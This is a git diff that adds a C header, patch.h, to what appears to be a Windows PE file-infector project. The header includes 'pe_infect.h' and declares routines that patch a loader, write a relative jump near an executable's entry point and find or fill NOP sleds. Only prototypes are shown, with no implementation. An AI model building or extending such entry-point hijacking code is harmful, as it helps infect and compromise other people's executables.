diff options
Diffstat (limited to 'include/patch.h')
-rw-r--r-- | include/patch.h | 21 |
1 files changed, 21 insertions, 0 deletions
diff --git a/include/patch.h b/include/patch.h new file mode 100644 index 0000000..d773620 --- /dev/null +++ b/include/patch.h @@ -0,0 +1,21 @@ +#ifndef PATCH_H_INCLUDED +#define PATCH_H_INCLUDED + +#include <windows.h> + +#include "pe_infect.h" + +#define SIZEOF_X86_JMP32 5 + + +void patchRelJMP(BYTE* buf, DWORD destVA); + +BOOL bPatchLoader(const struct ParsedPE* ppe); + +BOOL bPatchNearEntry(const struct ParsedPE* ppe); + +int offFindNopsled(const BYTE* buf, SIZE_T szBuf, SIZE_T szNopsled); + +void offFillNops(BYTE* buf, SIZE_T szFill); + +#endif /* PATCH_H_INCLUDED */ |